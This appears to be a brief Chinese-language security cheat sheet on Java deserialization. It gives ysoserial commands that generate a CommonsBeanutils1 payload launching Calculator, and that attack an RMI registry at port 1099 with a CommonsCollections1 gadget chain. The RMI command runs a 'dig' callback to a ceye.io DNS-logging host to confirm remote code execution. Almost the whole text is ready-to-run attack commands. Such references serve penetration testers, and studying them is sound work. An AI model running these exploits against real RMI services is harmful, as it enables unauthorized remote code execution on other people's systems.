Security CheatSheet

Reading time ~1 minute

Java 反序列化

ysoserial 生成 Payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'open /System/Applications/Calculator.app'

攻击 RMI

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 1.1.1.1 1099 CommonsCollections1 "dig test.xxxxx.ceye.io"